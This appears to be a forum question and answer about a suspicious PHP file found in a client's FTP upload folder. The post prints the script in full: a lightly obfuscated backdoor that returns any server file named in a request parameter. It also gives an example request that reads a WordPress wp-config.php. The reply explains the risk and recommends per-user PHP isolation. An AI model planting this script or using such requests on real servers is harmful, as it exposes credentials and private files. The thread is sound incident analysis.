I host a website for a client and we have been asked to host some extra images for the clients other third party website shop.
So i created a secondary FTP account that had its root set to some sub folder on the hosting.
The client had the web designer who was building out the layout for this external website place all the images in this FTP space.
Today i noticed some warning notices in the error_log and noticed it was coming from a php file that was also within this FTP space.
The contents of the PHP was this:
<?php
ini_set('display_errors',1);
$file1=trim($_REQUEST['f1']);
$read1=file_get_contents($file1);
$read1 = rawurlencode($read1);
echo "document.write(unescape(\"$read1\"))";
?>
When i first read the code i couldn't figure out why it was in the FTP space or what it did but i started playing around by adding some paths to the f1 parameter to see what response was returned and i found that i could output my wordpress installs wp-config.php file that is back a folder from this FTP's root folder.
e.g by running this parameter through the php script. it outputted the contents of my config: domain.com?f1=/mnt/storage/vhosts/domain.com/httpdocs/wordpress/wp-config.php
now I am just trying to figure out if this code could have been placed in the FTP storage for any other reason than to be malicious?
How can i protect my files from being read like this when giving out FTP access to a subfolder on a hosting?
Thanks.
The script opens the file passed in the GET parameter, reads it, URL encodes it and then sends it to the browser wrapped in some JavaScript that de-codes it client-side.
The script is virtually guaranteed to be written with malicious intent. While outputting the contents of a file may have legitimate uses, the (very basic) obfuscation technique used here pushes it over the edge of any reasonable doubt.
The FTP root of your user may be protected, but it seems that you do not run separate PHP interpreters for your users. That means that any user who can write code to their webspace and executes it through the PHP interpreter may run code as whatever user the PHP interpreter is running at. Since PHP necessarily needs to read the wordpress configuration, there is little you can do to secure the current setup.
Ideally, you will want to isolate every user in their own chroot or docker instance with their own PHP interpreter. Short of that, you should absolutely not allow FTP access or any other methods for uploading files on your system as the security model is simply not designed to withstand this level of user-access.